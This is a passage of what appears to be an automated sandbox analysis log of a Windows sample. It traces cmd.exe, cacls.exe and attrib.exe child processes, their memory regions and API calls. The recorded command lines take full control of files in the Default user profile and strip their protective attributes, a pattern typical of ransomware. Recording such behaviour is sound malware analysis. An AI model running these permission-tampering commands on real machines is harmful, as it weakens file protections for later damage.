\"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32051 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32052 start_va = 0xab0000 end_va = 0xab8fff entry_point = 0xab0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 32053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32056 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32058 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32059 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32060 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 32061 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32062 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 32063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32064 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32066 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32067 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32068 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32069 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 745 os_tid = 0xc20 Thread: id = 746 os_tid = 0xffc Process: id = "545" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16cc0" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "542" os_parent_pid = "0xb28" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32070 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32071 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32072 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32073 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32074 start_va = 0x660000 end_va = 0x666fff entry_point = 0x660000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32075 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32076 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32077 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32078 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32079 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32080 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32081 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32082 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32083 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32084 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32085 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32086 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32087 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32088 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32089 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32090 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32091 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32092 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32093 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32094 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32095 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32096 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32097 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 32098 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32099 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 747 os_tid = 0xb3c Process: id = "546" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32102 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32103 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32104 start_va = 0x4a530000 end_va = 0x4a57bfff entry_point = 0x4a530000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32105 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32106 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32107 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32108 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32109 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32110 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32111 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32112 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32113 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 32114 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 32115 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32116 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32117 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32118 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32119 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32120 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32121 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32122 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32123 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32124 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 32125 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32126 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32127 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32128 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32129 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32130 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32131 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 32132 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 32133 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 32134 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 748 os_tid = 0xc68 [0216.169] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fb2c | out: lpSystemTimeAsFileTime=0x20fb2c*(dwLowDateTime=0xb5a60ca0, dwHighDateTime=0x1d440a9)) [0216.169] GetCurrentProcessId () returned 0x53c [0216.169] GetCurrentThreadId () returned 0xc68 [0216.169] GetTickCount () returned 0x3c7b1 [0216.169] QueryPerformanceCounter (in: lpPerformanceCount=0x20fb24 | out: lpPerformanceCount=0x20fb24*=27295842232) returned 1 [0216.170] GetModuleHandleA (lpModuleName=0x0) returned 0x4a530000 [0216.170] __set_app_type (_Type=0x1) [0216.170] __p__fmode () returned 0x76b331f4 [0216.170] __p__commode () returned 0x76b331fc [0216.170] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5521a6) returned 0x0 [0216.170] __getmainargs (in: _Argc=0x4a554238, _Argv=0x4a554240, _Env=0x4a55423c, _DoWildCard=0, _StartInfo=0x4a554140 | out: _Argc=0x4a554238, _Argv=0x4a554240, _Env=0x4a55423c) returned 0 [0216.171] GetCurrentThreadId () returned 0xc68 [0216.171] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc68) returned 0x38 [0216.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.171] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.171] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.171] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.171] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fabc | out: phkResult=0x20fabc*=0x0) returned 0x2 [0216.171] VirtualQuery (in: lpAddress=0x20faf3, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0216.171] GetConsoleOutputCP () returned 0x1b5 [0216.172] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0216.172] SetConsoleCtrlHandler (HandlerRoutine=0x4a54e72a, Add=1) returned 1 [0216.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.172] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.172] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0216.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.172] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.172] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.172] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0216.173] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.173] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0216.173] GetEnvironmentStringsW () returned 0x3e0208* [0216.173] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.173] GetEnvironmentStringsW () returned 0x3e0208* [0216.173] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.173] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea2c | out: phkResult=0x20ea2c*=0x40) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x98, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x0, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegCloseKey (hKey=0x40) returned 0x0 [0216.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea2c | out: phkResult=0x20ea2c*=0x40) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x0, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x9, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x9, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x9, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegCloseKey (hKey=0x40) returned 0x0 [0216.174] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.175] srand (_Seed=0x5b8863b2) [0216.175] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" [0216.175] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" [0216.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a555260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.175] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.175] GetEnvironmentVariableW (in: lpName="PROMPT", 